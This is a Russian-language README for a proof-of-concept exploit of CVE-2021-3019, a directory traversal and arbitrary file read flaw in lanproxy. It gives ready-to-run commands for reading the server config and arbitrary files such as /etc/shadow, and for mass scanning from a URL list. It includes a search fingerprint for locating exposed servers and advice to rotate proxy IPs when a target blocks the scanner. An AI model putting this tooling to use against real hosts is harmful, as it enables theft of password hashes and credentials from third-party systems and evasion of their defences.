
CVE-2021-3019 lanproxy POC обнаружения уязвимости произвольного чтения файлов при обходе каталога
CVE-2021-3019 Уязвимость обхода каталогов и чтения произвольных файлов в lanproxy

git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
Запуск без параметров выводит справку

Проверка уязвимости для одного URL. Если уязвимость существует, по умолчанию читается конфигурационный файл и выводится результат
python3 POC.py -u http://127.0.0.1:9100

Используйте параметр -r для чтения других файлов системы. Требуется указать абсолютный путь к файлу
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow

Используйте параметр -f для массовой проверки. Уязвимые адреса будут записаны в файл success.txt
python3 POC.py -f urls.txt

"Server: LPS-0.1" && title=="登录"
При появлении Connection reset by peer с высокой вероятностью ваш IP был заблокирован целевым сервером. Просто смените прокси-IP.